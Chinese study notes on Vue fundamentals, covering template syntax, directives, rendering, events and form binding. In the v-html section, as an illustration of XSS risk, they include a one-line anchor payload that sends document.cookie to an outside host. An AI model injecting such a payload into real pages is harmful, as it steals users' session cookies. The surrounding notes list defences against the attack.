一. Vue 基础

```
1. 模板语法
    (1)插值
        a.文本 {{}}
        b.纯HTML
            v-html, 防止XSS,csrf(
                 (1) 前端过滤
                 (2) 后台转义(< > &lt; &gt;)
                 (3) 给cookie 加上属性 http
             )
    1 <a href=javascript:location.href='http://www.baidu.com?</pre>
    cookie='+document.cookie>click</a>
    2 // 删除& nbsp; 和 cookie前面的空格
        c.表达式
    (2)指令: 是带有 v- 前缀的特殊属性
        v-bind
        v-if v-show
        v-on:click
        v-for
    (3)缩写
        v-bind:src => :src
        v-on:click => @click
2. class 与 style
   (1)绑定HTML Class
            -对象语法
            -数组语法
   (2)绑定内联样式
            -对象语法
            -数组语法
            //需要将 font-size =>fontSize
3. 条件渲染
    (1)v-if
```

- (2)v-else v-else-if
- (3)template v-if ,包装元素template 不会被创建
- (4)v-show

4. 列表渲染

(1)v-for (特殊 v-for="n in 10")

a. in

b. of

- (2)key:
 - *跟踪每个节点的身份,从而重用和重新排序现有元素
 - *理想的 key 值是每项都有的且唯一的 id。data.id

(3)数组更新检测

- a. 使用以下方法操作数组,可以检测变动 push() pop() shift() unshift() splice() sort() reverse()
- b. filter(), concat() 和 slice(), map(), 新数组替换旧数组
- c. 不能检测以下变动的数组

vm.items[indexOfItem] = newValue

解决 (1)Vue.set(example1.items, indexOfItem, newValue)

(2)splice

(4)应用:显示过滤结果

5. 事件处理

- (1)监听事件-直接触发代码
- (2)方法事件处理器-写函数名 handleClick
- (3)内联处理器方法-执行函数表达式 handleClick(\$event) \$event 事件对象
- (4)事件修饰符 https://cn.vuejs.org/v2/guide/events.html
- (5)按键修饰符

6. 表单控件绑定/双向数据绑定

v-model

(1)基本用法

-购物车

(2<mark>)修饰符</mark>

.lazy:失去焦点同步一次

.number:格式化数字

.trim:去除首尾空格